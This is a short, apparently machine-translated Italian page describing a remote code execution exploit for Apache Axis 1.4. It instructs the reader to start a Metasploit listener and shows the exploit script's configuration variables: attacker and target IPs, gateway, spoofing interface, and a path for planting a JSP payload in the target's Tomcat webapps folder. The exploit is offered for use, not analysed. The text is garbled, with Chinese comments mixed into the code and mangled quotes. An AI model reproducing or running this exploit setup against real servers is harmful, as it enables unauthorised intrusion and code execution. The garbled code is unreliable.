
Apache Axis 1.4 vulnerabilità di esecuzione di codice remoto
Vulnerabilità di esecuzione remota di codice in Apache Axis 1.4 È necessario impostare un listener msf sulla macchina locale e modificare le righe 24-30 del codice.
#您需要更改这些变量以匹配您的配置 myip = “ 192.168.0.117 ” #IP della vostra macchina target = “ 192.168.0.102 ” #IP target 网关= “ 192.168.0.1 ” #Gateway predefinito targetport = “ 8080 ” #Porta su cui il target esegue Axis (probabilmente 8080) pathtoaxis = “ http://192.168.0.102:8080/axis ” #Questo può essere personalizzato in base all'installazione di Axis, ma questo è il default spoofinterface = “ eth0 ” #Interfaccia spoofing jspwritepath = “ webapps \ axis \ exploit.jsp ” #Percorso relativo per scrivere il payload JSP sul target; questo è il percorso predefinito per l'installazione di Tomcat